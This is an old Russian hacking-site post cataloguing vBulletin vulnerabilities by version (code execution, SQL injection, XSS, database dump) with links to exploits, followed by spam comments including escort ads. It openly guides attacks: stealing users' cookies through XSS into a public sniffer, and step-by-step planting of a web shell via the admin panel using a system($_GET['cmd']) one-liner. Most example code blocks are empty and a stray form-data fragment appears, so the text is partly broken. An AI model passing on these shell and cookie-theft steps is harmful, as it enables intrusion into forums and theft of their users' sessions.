Новости сайта
Главная страница » 2007 » Январь » 12 » vBulletin BUG

vBulletin BUG
Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*.

Узнаём версию форума.

В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.

Код:

vbulletin_ajax_threadslist.js

vbulletin_ajax_namesugg.js

vbulletin_attachment.js

vbulletin_cpcolorpicker.js

vbulletin_editor.js


Пример:


Код:

vBulletin 2
2.2.* - 2.2.4 - Выполнение произвольного кода
Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.

Exploit:
http://www.securitylab.ru/vulnerability/source/207147.php

2.3.* - SQL injection

Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.

Пример:

Код:

2.*.* - XSS

Описание уязвимости: уязвимость существует из-за недостаточной обработки тэга email.

Exploit:

Код:

Video:http://video.antichat.ru/file57.html

vBulletin 3.0
3.0.0 - XSS

Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:

3.0-3.0.4
- Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.

Пример:

Код:

О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html

3.0.3–3.0.9 XSS

Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.

Пример:

Код:

3.0.9 and 3.5.4 - XSS

Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:

vBulletin 3.5
3.5.2 - XSS

Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:

Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем
Пояснение: заходим в профиль и в поле email прописываем

Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку
Cookie уйдут на снифер.

3.5.4 - Дамп БД

Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.

Пример:

Код:

3.5.4 - XSS

Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:

Уязвимости в модулях vBulletin.
vBug Tracker 3.5.1 - XSS

Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:

ImpEx 1.74 - PHP-инклюдинг и выполнение команд

Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

Код:

Exploit:
http://www.securitylab.ru/vulnerability/source/264410.php

ibProArcade 2.x - SQL injection

Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

Пример:

Код:

Где [any_user] id нужного нам юзера.
При использовании XSS c указанным в теме снифером. Логи смотреть тут:
http://antichat.ru/sniff/log.php

Но лучше завести себе свой снифер. Это можно сделать тут:
http://antichat.ru/sniffer или тут: http://s.netsec.ru.

Шелл в vBulletin.

Разберёмся как залить шелл из админки воблы.

Способ заливки шелла в vBulletin 2.*.* и 3.0.*

1. Заходим в админку.

2. Смайлы.

3. Загрузить смайл.

4. Грузим наш шелл. (папка по умолчанию /images/smilies)

5. Заходим www.xz.сom/forumpath/images/smilies/shell.php

Примечание: сработает не везде.
Способ заливки шелла в vBulletin 3.5.*.

1. Заходим в админку.

2. Система модулей.

3. Добавить новый модуль.

Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);

4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

Видео по теме:

http://video.antichat.ru/file105.html

http://video.antichat.ru/file95.html

http://video.antichat.ru/file57.html

http://video.antichat.ru/file3.html

------------bEo2DN0KhgCU2ELtRpuvCF
Content-Disposition: form-data; name="format"

1

Просмотров: 11338 | Добавил: dozzer | Рейтинг: 5.0 |
Комментарии
Всего комментариев: 131 2 »
13 hfrpxvjz  
0
Я сегодня прислушался, вот http://flyrics.ru/7358-tekst-pesni-buzz-fuzz-x-cited.html - текст песни Buzz Fuzz - X-Cited

12 ufkcsmvf  
0
Я сегодня слышал, вот http://flyrics.ru/34-tekst-pesni-d-devils-the-6th-gate.html - текст песни D-Devils - The 6th Gate

11 Reciatieldnic  
0
[URL=http://bypaint.net - полководц портрет[/URL -

10 indinerne  
0
Всем привет, давно уже хочу вам показать интересный сайтик http://hitechnew.ru/ - Hi-tech, может кому очень понравится, а кому нет, сообщите что не прёт
http://hitechnew.ru/images/hzy0cstmzp1.jpg

9 Liska  
0
Приятно, сидя на работе. Отвлечься, от этой надоевшей работы. Расслабиться, и читать написанную тут информацию :)

8 JefbeKunfob  
0
Наш сайт создан для Вашего удовольствия, здесь Вы можете расслабиться, отдохнуть не только душой, но и телом, все самые мыслимые и не мыслимые удовольствия исполнят наши элитные индивидуалки,
Заходим сюда, звоним http://tinyurl.com/6aoezad
Наслаждаемся ))))
Вас ждет масса незабываемых впечатлений и ощущений )))

Вебмастера, кто желает хорошо зарабатывать, участвуем в партнерской программе,
до 60 центов за 1 клик http://tinyurl.com/5r2vr3w

7 dozzer  
0
привет

6 dozzer  
0
http://old.antichat.ru/inetcrack/ состоит из Inetcrack b

5 dozzer  
0
system_32
ога)

4 system_32  
0
куль ))) пссс)

1-10 11-13
Имя *:
Email *:
Код *: